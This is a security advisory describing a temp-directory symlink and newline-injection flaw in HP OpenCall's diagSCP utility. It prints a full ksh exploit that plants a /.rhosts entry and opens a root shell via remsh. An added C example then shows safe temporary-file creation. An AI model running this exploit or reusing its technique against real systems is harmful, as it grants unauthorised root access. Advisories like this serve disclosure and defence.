COMMAND

    diagSCP

SYSTEMS AFFECTED

    OpenCall platforms (HP)

PROBLEM

    The diagSCP utility creates a temporary directory in /tmp with a
    predictable name.  It will also happily follow any symlink placed
    in that directory.  The 'env' file created by diagSCP in this
    directory contains the user's environment, so its contents are
    under the user's control.  Inserting a ^J (newline) in a variable
    makes the rest of the value go to the next line, where it looks
    like a valid entry in .rhosts.  Thanks to Otto Sync for this
    exploit.

        #!/bin/ksh
        FILE=/.rhosts
        NEXT=`expr $$ + 5`
        mkdir /tmp/diagSCP.$NEXT
        ln -s $FILE /tmp/diagSCP.$NEXT/env
        export GUESSWHAT="
        localhost `whoami`"
        diagSCP &
        sleep 2
        kill $NEXT
        echo "\nFrench kiss ? root kiss !\n"
        remsh localhost -l root ksh -i
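
    For comparison, an added example (not HP's code and not part of the
    original advisory) of how a utility can create its scratch directory
    and 'env' file so that none of the three conditions above holds. The
    function names, the /tmp/diagdemo prefix and the sample entry are
    assumptions made for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create an unpredictable directory, mode 0700, from a template ending in
 * "XXXXXX". A name derived from the PID can be created in advance by
 * another local user; this one cannot be guessed. */
int make_private_dir(char *tmpl)
{
    return mkdtemp(tmpl) ? 0 : -1;
}

/* Create dir/name for writing. O_EXCL makes open() fail if anything already
 * exists at that path, symlinks included, and O_NOFOLLOW refuses a symlink
 * in the final component. */
int open_new_file(const char *dir, const char *name)
{
    char path[4096];
    int n = snprintf(path, sizeof path, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= sizeof path)
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Write one NAME=value entry on exactly one line: control characters
 * (newline included) become '?', so a value cannot start a new line. */
int write_entry(int fd, const char *entry)
{
    for (const char *p = entry; *p; p++) {
        unsigned char c = (unsigned char)*p;
        char out = (c < 0x20 || c == 0x7f) ? '?' : (char)c;
        if (write(fd, &out, 1) != 1)
            return -1;
    }
    return write(fd, "\n", 1) == 1 ? 0 : -1;
}

int main(void)
{
    char dir[] = "/tmp/diagdemo.XXXXXX";   /* constructed sample name */
    if (make_private_dir(dir) != 0) return 1;
    int fd = open_new_file(dir, "env");
    if (fd < 0) return 1;
    int rc = write_entry(fd, "GUESSWHAT=\nlocalhost user"); /* constructed */
    close(fd);
    printf("wrote %s/env\n", dir);
    return rc ? 1 : 0;
}
```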